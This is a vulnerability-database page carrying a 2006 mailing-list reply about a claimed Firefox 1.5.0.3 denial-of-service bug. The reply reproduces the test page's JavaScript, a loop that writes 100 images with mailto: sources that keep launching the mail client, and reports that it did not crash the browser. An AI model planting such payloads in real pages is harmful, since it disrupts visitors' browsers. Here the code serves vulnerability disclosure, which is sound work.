Firefox 1.5.0.3 - DoS

2006.05.12
Risk: Medium
Local: Yes
Remote: Yes
CWE: N/A


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 p4.werterxyz (at) gmail (dot) com [email concealed] wrote: > test2: > http://werterxyz.altervista.org/test2.html > http://geocities.com/werterxyz/test2.html Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for a few seconds and launched Outlook Express, but that's it). Here is the code since the original poster didn't see fit to publish it. <Head> <Title>test2 by P4</Title> </Head> <Body> <!-- following code added by server. PLEASE REMOVE --> <!-- preceding code added by server. PLEASE REMOVE --> <SCRIPT Language="Javascript"> for(i=0; i<100; i++){ document.write('<Img src="mailto:test (at) test (dot) com [email concealed]?subject=test email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona "Mostra immagine" (View Image)') } </SCRIPT> </Body> <!-- text below generated by server. PLEASE REMOVE - --></object></layer></div></span></style></noscript></table></script></a pplet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?us1147288798" alt="setstats" border="0" width="1" height="1"></noscript> <IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61" ALT=1 WIDTH=1 HEIGHT=1> > > Saluti da P4 - -- Chris Horry KG4TSM "A conservative is a man with two perfectly zerbey (at) wibble.co (dot) uk [email concealed] good legs who, however, has never learned how http://www.wibble.co.uk to walk forward". -- Franklin D. Roosevelt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF 9DAmdMxX5LaboCYnYTtr4GM= =z8eV -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top